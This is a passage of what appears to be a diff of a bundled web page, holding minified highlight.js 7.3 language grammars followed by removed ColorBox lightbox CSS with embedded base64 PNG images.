/>]+"},b]}]}}(hljs);hljs.LANGUAGES.markdown=function(a){return{c:[{cN:"header",b:"^#{1,3}",e:"$"},{cN:"header",b:"^.+?\\n[=-]{2,}$"},{b:"<",e:">",sL:"xml",r:0},{cN:"bullet",b:"^([*+-]|(\\d+\\.))\\s+"},{cN:"strong",b:"[*_]{2}.+?[*_]{2}"},{cN:"emphasis",b:"\\*.+?\\*"},{cN:"emphasis",b:"_.+?_",r:0},{cN:"blockquote",b:"^>\\s+",e:"$"},{cN:"code",b:"`.+?`"},{cN:"code",b:"^    ",e:"$",r:0},{cN:"horizontal_rule",b:"^-{3,}",e:"$"},{b:"\\[.+?\\]\\(.+?\\)",rB:true,c:[{cN:"link_label",b:"\\[.+\\]"},{cN:"link_url",b:"\\(",e:"\\)",eB:true,eE:true}]}]}}(hljs);hljs.LANGUAGES.css=function(a){var b={cN:"function",b:a.IR+"\\(",e:"\\)",c:[a.NM,a.ASM,a.QSM]};return{cI:true,i:"[=/|']",c:[a.CBLCLM,{cN:"id",b:"\\#[A-Za-z0-9_-]+"},{cN:"class",b:"\\.[A-Za-z0-9_-]+",r:0},{cN:"attr_selector",b:"\\[",e:"\\]",i:"$"},{cN:"pseudo",b:":(:)?[a-zA-Z0-9\\_\\-\\+\\(\\)\\\"\\']+"},{cN:"at_rule",b:"@(font-face|page)",l:"[a-z-]+",k:"font-face page"},{cN:"at_rule",b:"@",e:"[{;]",eE:true,k:"import page media charset",c:[b,a.ASM,a.QSM,a.NM]},{cN:"tag",b:a.IR,r:0},{cN:"rules",b:"{",e:"}",i:"[^\\s]",r:0,c:[a.CBLCLM,{cN:"rule",b:"[^\\s]",rB:true,e:";",eW:true,c:[{cN:"attribute",b:"[A-Z\\_\\.\\-]+",e:":",eE:true,i:"[^\\s]",starts:{cN:"value",eW:true,eE:true,c:[b,a.NM,a.QSM,a.ASM,a.CBLCLM,{cN:"hexcolor",b:"\\#[0-9A-F]+"},{cN:"important",b:"!important"}]}}]}]}]}}(hljs);hljs.LANGUAGES.http=function(a){return{i:"\\S",c:[{cN:"status",b:"^HTTP/[0-9\\.]+",e:"$",c:[{cN:"number",b:"\\b\\d{3}\\b"}]},{cN:"request",b:"^[A-Z]+ (.*?) HTTP/[0-9\\.]+$",rB:true,e:"$",c:[{cN:"string",b:" ",e:" ",eB:true,eE:true}]},{cN:"attribute",b:"^\\w",e:": ",eE:true,i:"\\n|\\s|=",starts:{cN:"string",e:"$"}},{b:"\\n\\n",starts:{sL:"",eW:true}}]}}(hljs);hljs.LANGUAGES.java=function(a){return{k:"false synchronized int abstract float private char boolean static null if const for true while long throw strictfp finally protected import native final return void enum else break transient new catch instanceof byte super volatile case assert short package default double public try this switch continue throws",c:[{cN:"javadoc",b:"/\\*\\*",e:"\\*/",c:[{cN:"javadoctag",b:"@[A-Za-z]+"}],r:10},a.CLCM,a.CBLCLM,a.ASM,a.QSM,{cN:"class",bWK:true,e:"{",k:"class interface",i:":",c:[{bWK:true,k:"extends implements",r:10},{cN:"title",b:a.UIR}]},a.CNM,{cN:"annotation",b:"@[A-Za-z]+"}]}}(hljs);hljs.LANGUAGES.php=function(a){var e={cN:"variable",b:"\\$+[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*"};var b=[a.inherit(a.ASM,{i:null}),a.inherit(a.QSM,{i:null}),{cN:"string",b:'b"',e:'"',c:[a.BE]},{cN:"string",b:"b'",e:"'",c:[a.BE]}];var c=[a.BNM,a.CNM];var d={cN:"title",b:a.UIR};return{cI:true,k:"and include_once list abstract global private echo interface as static endswitch array null if endwhile or const for endforeach self var while isset public protected exit foreach throw elseif include __FILE__ empty require_once do xor return implements parent clone use __CLASS__ __LINE__ else break print eval new catch __METHOD__ case exception php_user_filter default die require __FUNCTION__ enddeclare final try this switch continue endfor endif declare unset true false namespace trait goto instanceof insteadof __DIR__ __NAMESPACE__ __halt_compiler",c:[a.CLCM,a.HCM,{cN:"comment",b:"/\\*",e:"\\*/",c:[{cN:"phpdoc",b:"\\s@[A-Za-z]+"}]},{cN:"comment",eB:true,b:"__halt_compiler.+?;",eW:true},{cN:"string",b:"<<<['\"]?\\w+['\"]?$",e:"^\\w+;",c:[a.BE]},{cN:"preprocessor",b:"<\\?php",r:10},{cN:"preprocessor",b:"\\?>"},e,{cN:"function",bWK:true,e:"{",k:"function",i:"\\$|\\[|%",c:[d,{cN:"params",b:"\\(",e:"\\)",c:["self",e,a.CBLCLM].concat(b).concat(c)}]},{cN:"class",bWK:true,e:"{",k:"class",i:"[:\\(\\$]",c:[{bWK:true,eW:true,k:"extends",c:[d]},d]},{b:"=>"}].concat(b).concat(c)}}(hljs);hljs.LANGUAGES.python=function(a){var f={cN:"prompt",b:"^(>>>|\\.\\.\\.) "};var c=[{cN:"string",b:"(u|b)?r?'''",e:"'''",c:[f],r:10},{cN:"string",b:'(u|b)?r?"""',e:'"""',c:[f],r:10},{cN:"string",b:"(u|r|ur)'",e:"'",c:[a.BE],r:10},{cN:"string",b:'(u|r|ur)"',e:'"',c:[a.BE],r:10},{cN:"string",b:"(b|br)'",e:"'",c:[a.BE]},{cN:"string",b:'(b|br)"',e:'"',c:[a.BE]}].concat([a.ASM,a.QSM]);var e={cN:"title",b:a.UIR};var d={cN:"params",b:"\\(",e:"\\)",c:["self",a.CNM,f].concat(c)};var b={bWK:true,e:":",i:"[${=;\\n]",c:[e,d],r:10};return{k:{keyword:"and elif is global as in if from raise for except finally print import pass return exec else break not with class assert yield try while continue del or def lambda nonlocal|10",built_in:"None True False Ellipsis NotImplemented"},i:"(</|->|\\?)",c:c.concat([f,a.HCM,a.inherit(b,{cN:"function",k:"def"}),a.inherit(b,{cN:"class",k:"class"}),a.CNM,{cN:"decorator",b:"@",e:"$"},{b:"\\b(print|exec)\\("}])}}(hljs);hljs.LANGUAGES.sql=function(a){return{cI:true,c:[{cN:"operator",b:"(begin|start|commit|rollback|savepoint|lock|alter|create|drop|rename|call|delete|do|handler|insert|load|replace|select|truncate|update|set|show|pragma|grant)\\b(?!:)",e:";",eW:true,k:{keyword:"all partial global month current_timestamp using go revoke smallint indicator end-exec disconnect zone with character assertion to add current_user usage input local alter match collate real then rollback get read timestamp session_user not integer bit unique day minute desc insert execute like ilike|2 level decimal drop continue isolation found where constraints domain right national some module transaction relative second connect escape close system_user for deferred section cast current sqlstate allocate intersect deallocate numeric public preserve full goto initially asc no key output collation group by union session both last language constraint column of space foreign deferrable prior connection unknown action commit view or first into float year primary cascaded except restrict set references names table outer open select size are rows from prepare distinct leading create only next inner authorization schema corresponding option declare precision immediate else timezone_minute external varying translation true case exception join hour default double scroll value cursor descriptor values dec fetch procedure delete and false int is describe char as at in varchar null trailing any absolute current_time end grant privileges when cross check write current_date pad begin temporary exec time update catalog user sql date on identity timezone_hour natural whenever interval work order cascade diagnostics nchar having left call do handler load replace truncate start lock show pragma exists number",aggregate:"count sum min max avg"},c:[{cN:"string",b:"'",e:"'",c:[a.BE,{b:"''"}],r:0},{cN:"string",b:'"',e:'"',c:[a.BE,{b:'""'}],r:0},{cN:"string",b:"`",e:"`",c:[a.BE]},a.CNM]},a.CBLCLM,{cN:"comment",b:"--",e:"$"}]}}(hljs);hljs.LANGUAGES.vala=function(a){return{k:{keyword:"char uchar unichar int uint long ulong short ushort int8 int16 int32 int64 uint8 uint16 uint32 uint64 float double bool struct enum string void weak unowned owned async signal static abstract interface override while do for foreach else switch case break default return try catch public private protected internal using new this get set const stdout stdin stderr var",built_in:"DBus GLib CCode Gee Object",literal:"false true null"},c:[{cN:"class",bWK:true,e:"{",k:"class interface delegate namespace",c:[{bWK:true,k:"extends implements"},{cN:"title",b:a.UIR}]},a.CLCM,a.CBLCLM,{cN:"string",b:'"""',e:'"""',r:5},a.ASM,a.QSM,a.CNM,{cN:"preprocessor",b:"^#",e:"$",r:2},{cN:"constant",b:" [A-Z_]+ ",r:0}]}}(hljs);hljs.LANGUAGES.perl=function(e){var a="getpwent getservent quotemeta msgrcv scalar kill dbmclose undef lc ma syswrite tr send umask sysopen shmwrite vec qx utime local oct semctl localtime readpipe do return format read sprintf dbmopen pop getpgrp not getpwnam rewinddir qqfileno qw endprotoent wait sethostent bless s|0 opendir continue each sleep endgrent shutdown dump chomp connect getsockname die socketpair close flock exists index shmgetsub for endpwent redo lstat msgctl setpgrp abs exit select print ref gethostbyaddr unshift fcntl syscall goto getnetbyaddr join gmtime symlink semget splice x|0 getpeername recv log setsockopt cos last reverse gethostbyname getgrnam study formline endhostent times chop length gethostent getnetent pack getprotoent getservbyname rand mkdir pos chmod y|0 substr endnetent printf next open msgsnd readdir use unlink getsockopt getpriority rindex wantarray hex system getservbyport endservent int chr untie rmdir prototype tell listen fork shmread ucfirst setprotoent else sysseek link getgrgid shmctl waitpid unpack getnetbyname reset chdir grep split require caller lcfirst until warn while values shift telldir getpwuid my getprotobynumber delete and sort uc defined srand accept package seekdir getprotobyname semop our rename seek if q|0 chroot sysread setpwent no crypt getc chown sqrt write setnetent setpriority foreach tie sin msgget map stat getlogin unless elsif truncate exec keys glob tied closedirioctl socket readlink eval xor readline binmode setservent eof ord bind alarm pipe atan2 getgrent exp time push setgrent gt lt or ne m|0 break given say state when";var d={cN:"subst",b:"[$@]\\{",e:"\\}",k:a,r:10};var b={cN:"variable",b:"\\$\\d"};var i={cN:"variable",b:"[\\$\\%\\@\\*](\\^\\w\\b|#\\w+(\\:\\:\\w+)*|[^\\s\\w{]|{\\w+}|\\w+(\\:\\:\\w*)*)"};var f=[e.BE,d,b,i];var h={b:"->",c:[{b:e.IR},{b:"{",e:"}"}]};var g={cN:"comment",b:"^(__END__|__DATA__)",e:"\\n$",r:5};var c=[b,i,e.HCM,g,{cN:"comment",b:"^\\=\\w",e:"\\=cut",eW:true},h,{cN:"string",b:"q[qwxr]?\\s*\\(",e:"\\)",c:f,r:5},{cN:"string",b:"q[qwxr]?\\s*\\[",e:"\\]",c:f,r:5},{cN:"string",b:"q[qwxr]?\\s*\\{",e:"\\}",c:f,r:5},{cN:"string",b:"q[qwxr]?\\s*\\|",e:"\\|",c:f,r:5},{cN:"string",b:"q[qwxr]?\\s*\\<",e:"\\>",c:f,r:5},{cN:"string",b:"qw\\s+q",e:"q",c:f,r:5},{cN:"string",b:"'",e:"'",c:[e.BE],r:0},{cN:"string",b:'"',e:'"',c:f,r:0},{cN:"string",b:"`",e:"`",c:[e.BE]},{cN:"string",b:"{\\w+}",r:0},{cN:"string",b:"-?\\w+\\s*\\=\\>",r:0},{cN:"number",b:"(\\b0[0-7_]+)|(\\b0x[0-9a-fA-F_]+)|(\\b[1-9][0-9_]*(\\.[0-9_]+)?)|[0_]\\b",r:0},{b:"("+e.RSR+"|\\b(split|return|print|reverse|grep)\\b)\\s*",k:"split return print reverse grep",r:0,c:[e.HCM,g,{cN:"regexp",b:"(s|tr|y)/(\\\\.|[^/])*/(\\\\.|[^/])*/[a-z]*",r:10},{cN:"regexp",b:"(m|qr)?/",e:"/[a-z]*",c:[e.BE],r:0}]},{cN:"sub",bWK:true,e:"(\\s*\\(.*?\\))?[;{]",k:"sub",r:5},{cN:"operator",b:"-\\w\\b",r:0}];d.c=c;h.c[1].c=c;return{k:a,c:c}}(hljs);hljs.LANGUAGES.scala=function(a){var c={cN:"annotation",b:"@[A-Za-z]+"};var b={cN:"string",b:'u?r?"""',e:'"""',r:10};return{k:"type yield lazy override def with val var false true sealed abstract private trait object null if for while throw finally protected extends import final return else break new catch super class case package default try this match continue throws",c:[{cN:"javadoc",b:"/\\*\\*",e:"\\*/",c:[{cN:"javadoctag",b:"@[A-Za-z]+"}],r:10},a.CLCM,a.CBLCLM,a.ASM,a.QSM,b,{cN:"class",b:"((case )?class |object |trait )",e:"({|$)",i:":",k:"case class trait object",c:[{bWK:true,k:"extends with",r:10},{cN:"title",b:a.UIR},{cN:"params",b:"\\(",e:"\\)",c:[a.ASM,a.QSM,b,c]}]},a.CNM,c]}}(hljs);hljs.LANGUAGES.cmake=function(a){return{cI:true,k:"add_custom_command add_custom_target add_definitions add_dependencies add_executable add_library add_subdirectory add_test aux_source_directory break build_command cmake_minimum_required cmake_policy configure_file create_test_sourcelist define_property else elseif enable_language enable_testing endforeach endfunction endif endmacro endwhile execute_process export find_file find_library find_package find_path find_program fltk_wrap_ui foreach function get_cmake_property get_directory_property get_filename_component get_property get_source_file_property get_target_property get_test_property if include include_directories include_external_msproject include_regular_expression install link_directories load_cache load_command macro mark_as_advanced message option output_required_files project qt_wrap_cpp qt_wrap_ui remove_definitions return separate_arguments set set_directory_properties set_property set_source_files_properties set_target_properties set_tests_properties site_name source_group string target_link_libraries try_compile try_run unset variable_watch while build_name exec_program export_library_dependencies install_files install_programs install_targets link_libraries make_directory remove subdir_depends subdirs use_mangled_mesa utility_source variable_requires write_file",c:[{cN:"envvar",b:"\\${",e:"}"},a.HCM,a.QSM,a.NM]}}(hljs);hljs.LANGUAGES.objectivec=function(a){var b={keyword:"int float while private char catch export sizeof typedef const struct for union unsigned long volatile static protected bool mutable if public do return goto void enum else break extern class asm case short default double throw register explicit signed typename try this switch continue wchar_t inline readonly assign property protocol self synchronized end synthesize id optional required implementation nonatomic interface super unichar finally dynamic IBOutlet IBAction selector strong weak readonly",literal:"false true FALSE TRUE nil YES NO NULL",built_in:"NSString NSDictionary CGRect CGPoint UIButton UILabel UITextView UIWebView MKMapView UISegmentedControl NSObject UITableViewDelegate UITableViewDataSource NSThread UIActivityIndicator UITabbar UIToolBar UIBarButtonItem UIImageView NSAutoreleasePool UITableView BOOL NSInteger CGFloat NSException NSLog NSMutableString NSMutableArray NSMutableDictionary NSURL NSIndexPath CGSize UITableViewCell UIView UIViewController UINavigationBar UINavigationController UITabBarController UIPopoverController UIPopoverControllerDelegate UIImage NSNumber UISearchBar NSFetchedResultsController NSFetchedResultsChangeType UIScrollView UIScrollViewDelegate UIEdgeInsets UIColor UIFont UIApplication NSNotFound NSNotificationCenter NSNotification UILocalNotification NSBundle NSFileManager NSTimeInterval NSDate NSCalendar NSUserDefaults UIWindow NSRange NSArray NSError NSURLRequest NSURLConnection class UIInterfaceOrientation MPMoviePlayerController dispatch_once_t dispatch_queue_t dispatch_sync dispatch_async dispatch_once"};return{k:b,i:"</",c:[a.CLCM,a.CBLCLM,a.CNM,a.QSM,{cN:"string",b:"'",e:"[^\\\\]'",i:"[^\\\\][^']"},{cN:"preprocessor",b:"#import",e:"$",c:[{cN:"title",b:'"',e:'"'},{cN:"title",b:"<",e:">"}]},{cN:"preprocessor",b:"#",e:"$"},{cN:"class",bWK:true,e:"({|$)",k:"interface class protocol implementation",c:[{cN:"id",b:a.UIR}]},{cN:"variable",b:"\\."+a.UIR}]}}(hljs);hljs.LANGUAGES.coffeescript=function(c){var b={keyword:"in if for while finally new do return else break catch instanceof throw try this switch continue typeof delete debugger super then unless until loop of by when and or is isnt not",literal:"true false null undefined yes no on off ",reserved:"case default function var void with const let enum export import native __hasProp __extends __slice __bind __indexOf"};var a="[A-Za-z$_][0-9A-Za-z$_]*";var e={cN:"title",b:a};var d={cN:"subst",b:"#\\{",e:"}",k:b,c:[c.BNM,c.CNM]};return{k:b,c:[c.BNM,c.CNM,c.ASM,{cN:"string",b:'"""',e:'"""',c:[c.BE,d]},{cN:"string",b:'"',e:'"',c:[c.BE,d],r:0},{cN:"comment",b:"###",e:"###"},c.HCM,{cN:"regexp",b:"///",e:"///",c:[c.HCM]},{cN:"regexp",b:"//[gim]*"},{cN:"regexp",b:"/\\S(\\\\.|[^\\n])*/[gim]*"},{b:"`",e:"`",eB:true,eE:true,sL:"javascript"},{cN:"function",b:a+"\\s*=\\s*(\\(.+\\))?\\s*[-=]>",rB:true,c:[e,{cN:"params",b:"\\(",e:"\\)"}]},{cN:"class",bWK:true,k:"class",e:"$",i:":",c:[{bWK:true,k:"extends",eW:true,i:":",c:[e]},e]},{cN:"property",b:"@"+a}]}}(hljs);hljs.LANGUAGES.r=function(a){var b="([a-zA-Z]|\\.[a-zA-Z.])[a-zA-Z0-9._]*";return{c:[a.HCM,{b:b,l:b,k:{keyword:"function if in break next repeat else for return switch while try tryCatch|10 stop warning require library attach detach source setMethod setGeneric setGroupGeneric setClass ...|10",literal:"NULL NA TRUE FALSE T F Inf NaN NA_integer_|10 NA_real_|10 NA_character_|10 NA_complex_|10"},r:0},{cN:"number",b:"0[xX][0-9a-fA-F]+[Li]?\\b",r:0},{cN:"number",b:"\\d+(?:[eE][+\\-]?\\d*)?L\\b",r:0},{cN:"number",b:"\\d+\\.(?!\\d)(?:i\\b)?",r:0},{cN:"number",b:"\\d+(?:\\.\\d*)?(?:[eE][+\\-]?\\d*)?i?\\b",r:0},{cN:"number",b:"\\.\\d+(?:[eE][+\\-]?\\d*)?i?\\b",r:0},{b:"`",e:"`",r:0},{cN:"string",b:'"',e:'"',c:[a.BE],r:0},{cN:"string",b:"'",e:"'",c:[a.BE],r:0}]}}(hljs);hljs.LANGUAGES.json=function(a){var e={literal:"true false null"};var d=[a.QSM,a.CNM];var c={cN:"value",e:",",eW:true,eE:true,c:d,k:e};var b={b:"{",e:"}",c:[{cN:"attribute",b:'\\s*"',e:'"\\s*:\\s*',eB:true,eE:true,c:[a.BE],i:"\\n",starts:c}],i:"\\S"};var f={b:"\\[",e:"\\]",c:[a.inherit(c,{cN:null})],i:"\\S"};d.splice(d.length,0,b,f);return{c:d,k:e,i:"\\S"}}(hljs);hljs.LANGUAGES.django=function(c){function e(h,g){return(g==undefined||(!h.cN&&g.cN=="tag")||h.cN=="value")}function f(l,k){var g={};for(var j in l){if(j!="contains"){g[j]=l[j]}var m=[];for(var h=0;l.c&&h<l.c.length;h++){m.push(f(l.c[h],l))}if(e(l,k)){m=b.concat(m)}if(m.length){g.c=m}}return g}var d={cN:"filter",b:"\\|[A-Za-z]+\\:?",eE:true,k:"truncatewords removetags linebreaksbr yesno get_digit timesince random striptags filesizeformat escape linebreaks length_is ljust rjust cut urlize fix_ampersands title floatformat capfirst pprint divisibleby add make_list unordered_list urlencode timeuntil urlizetrunc wordcount stringformat linenumbers slice date dictsort dictsortreversed default_if_none pluralize lower join center default truncatewords_html upper length phone2numeric wordwrap time addslashes slugify first escapejs force_escape iriencode last safe safeseq truncatechars localize unlocalize localtime utc timezone",c:[{cN:"argument",b:'"',e:'"'}]};var b=[{cN:"template_comment",b:"{%\\s*comment\\s*%}",e:"{%\\s*endcomment\\s*%}"},{cN:"template_comment",b:"{#",e:"#}"},{cN:"template_tag",b:"{%",e:"%}",k:"comment endcomment load templatetag ifchanged endifchanged if endif firstof for endfor in ifnotequal endifnotequal widthratio extends include spaceless endspaceless regroup by as ifequal endifequal ssi now with cycle url filter endfilter debug block endblock else autoescape endautoescape csrf_token empty elif endwith static trans blocktrans endblocktrans get_static_prefix get_media_prefix plural get_current_language language get_available_languages get_current_language_bidi get_language_info get_language_info_list localize endlocalize localtime endlocaltime timezone endtimezone get_current_timezone",c:[d]},{cN:"variable",b:"{{",e:"}}",c:[d]}];var a=f(c.LANGUAGES.xml);a.cI=true;return a}(hljs);hljs.LANGUAGES.cpp=function(a){var b={keyword:"false int float while private char catch export virtual operator sizeof dynamic_cast|10 typedef const_cast|10 const struct for static_cast|10 union namespace unsigned long throw volatile static protected bool template mutable if public friend do return goto auto void enum else break new extern using true class asm case typeid short reinterpret_cast|10 default double register explicit signed typename try this switch continue wchar_t inline delete alignof char16_t char32_t constexpr decltype noexcept nullptr static_assert thread_local restrict _Bool complex",built_in:"std string cin cout cerr clog stringstream istringstream ostringstream auto_ptr deque list queue stack vector map set bitset multiset multimap unordered_set unordered_map unordered_multiset unordered_multimap array shared_ptr"};return{k:b,i:"</",c:[a.CLCM,a.CBLCLM,a.QSM,{cN:"string",b:"'\\\\?.",e:"'",i:"."},{cN:"number",b:"\\b(\\d+(\\.\\d*)?|\\.\\d+)(u|U|l|L|ul|UL|f|F)"},a.CNM,{cN:"preprocessor",b:"#",e:"$"},{cN:"stl_container",b:"\\b(deque|list|queue|stack|vector|map|set|bitset|multiset|multimap|unordered_map|unordered_set|unordered_multiset|unordered_multimap|array)\\s*<",e:">",k:b,r:10,c:["self"]}]}}(hljs);hljs.LANGUAGES.matlab=function(a){var b=[a.CNM,{cN:"string",b:"'",e:"'",c:[a.BE,{b:"''"}],r:0}];return{k:{keyword:"break case catch classdef continue else elseif end enumerated events for function global if methods otherwise parfor persistent properties return spmd switch try while",built_in:"sin sind sinh asin asind asinh cos cosd cosh acos acosd acosh tan tand tanh atan atand atan2 atanh sec secd sech asec asecd asech csc cscd csch acsc acscd acsch cot cotd coth acot acotd acoth hypot exp expm1 log log1p log10 log2 pow2 realpow reallog realsqrt sqrt nthroot nextpow2 abs angle complex conj imag real unwrap isreal cplxpair fix floor ceil round mod rem sign airy besselj bessely besselh besseli besselk beta betainc betaln ellipj ellipke erf erfc erfcx erfinv expint gamma gammainc gammaln psi legendre cross dot factor isprime primes gcd lcm rat rats perms nchoosek factorial cart2sph cart2pol pol2cart sph2cart hsv2rgb rgb2hsv zeros ones eye repmat rand randn linspace logspace freqspace meshgrid accumarray size length ndims numel disp isempty isequal isequalwithequalnans cat reshape diag blkdiag tril triu fliplr flipud flipdim rot90 find sub2ind ind2sub bsxfun ndgrid permute ipermute shiftdim circshift squeeze isscalar isvector ans eps realmax realmin pi i inf nan isnan isinf isfinite j why compan gallery hadamard hankel hilb invhilb magic pascal rosser toeplitz vander wilkinson"},i:'(//|"|#|/\\*|\\s+/\\w+)',c:[{cN:"function",bWK:true,e:"$",k:"function",c:[{cN:"title",b:a.UIR},{cN:"params",b:"\\(",e:"\\)"},{cN:"params",b:"\\[",e:"\\]"}]},{cN:"transposed_variable",b:"[a-zA-Z_][a-zA-Z_0-9]*('+[\\.']*|[\\.']+)",e:""},{cN:"matrix",b:"\\[",e:"\\]'*[\\.']*",c:b},{cN:"cell",b:"\\{",e:"\\}'*[\\.']*",c:b},{cN:"comment",b:"\\%",e:"$"}].concat(b)}}(hljs);
-</script>
-<!-- END extlib/js/highlight-7.3.pack.min.js -->
-<!-- START extlib/css/colorbox.css -->
-<style id="style:extlib/css/colorbox.css">/*
-    ColorBox Core Style:
-    The following CSS is consistent between example themes and should not be altered.
-*/
-#colorbox, #cboxOverlay, #cboxWrapper{position:absolute; top:0; left:0; z-index:9999; overflow:hidden;}
-#cboxOverlay{position:fixed; width:100%; height:100%;}
-#cboxMiddleLeft, #cboxBottomLeft{clear:left;}
-#cboxContent{position:relative;}
-#cboxLoadedContent{overflow:auto;}
-#cboxTitle{margin:0;}
-#cboxLoadingOverlay, #cboxLoadingGraphic{position:absolute; top:0; left:0; width:100%; height:100%;}
-#cboxPrevious, #cboxNext, #cboxClose, #cboxSlideshow{cursor:pointer;}
-.cboxPhoto{float:left; margin:auto; border:0; display:block; max-width:none;}
-.cboxIframe{width:100%; height:100%; display:block; border:0;}
-#colorbox, #cboxContent, #cboxLoadedContent{box-sizing:content-box;}
-
-/*
-    User Style:
-    Change the following styles to modify the appearance of ColorBox.  They are
-    ordered & tabbed in a way that represents the nesting of the generated HTML.
-*/
-#cboxOverlay{background:#000;}
-
-#colorbox{}
-
-        #cboxTitle{position:absolute; bottom:-25px; left:0; text-align:center; width:100%; font-weight:bold; color:#7C7C7C;}
-        #cboxCurrent{position:absolute; bottom:-25px; left:58px; font-weight:bold; color:#7C7C7C;}
-
-        #cboxPrevious, #cboxNext, #cboxClose, #cboxSlideshow{position:absolute; bottom:-29px; background-repeat: no-repeat; background-position: 0px 0px; width:23px; height:23px; text-indent:-9999px;}
-        #cboxPrevious{left:0px; background-position: -51px -25px;}
-        #cboxPrevious:hover{background-position:-51px 0px;}
-        #cboxNext{left:27px; background-position:-75px -25px;}
-        #cboxNext:hover{background-position:-75px 0px;}
-        #cboxClose{right:0; background-position:-100px -25px;}
-        #cboxClose:hover{background-position:-100px 0px;}
-
-        .cboxSlideshow_on #cboxSlideshow{background-position:-125px 0px; right:27px;}
-        .cboxSlideshow_on #cboxSlideshow:hover{background-position:-150px 0px;}
-        .cboxSlideshow_off #cboxSlideshow{background-position:-150px -25px; right:27px;}
-        .cboxSlideshow_off #cboxSlideshow:hover{background-position:-125px 0px;}
-
-/* begin inline customizing */
-
-    #cboxBottomCenter{height:43px; background-repeat: repeat-x; background-position: bottom left;}
-    #cboxTopCenter{height:14px; background-repeat: repeat-x; background-position: top left;}
-
-    #cboxBottomCenter, #cboxTopCenter {background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAABLCAMAAACGCB2xAAAAM1BMVEVSUlJHR0dPT09BQUFLS0tQUFA6OjpgYGCKioozMzPS0tJaWlpRUVHy8vKJiYn////m5eV3dK93AAAAK0lEQVR4XqXBhQ2AQBAAsJ48bvtPywyE1GLGYUgtlPuT0+b5abealNDScL0YiAPSV/RH9wAAAABJRU5ErkJggg==);}
-
-    #cboxTopLeft, #cboxTopRight, #cboxBottomLeft, #cboxBottomRight, #cboxMiddleLeft,
-
-    #cboxMiddleRight, #cboxContent,#cboxPrevious, #cboxNext, #cboxClose, #cboxSlideshow {
-        background-image:url(data:image/png;base64,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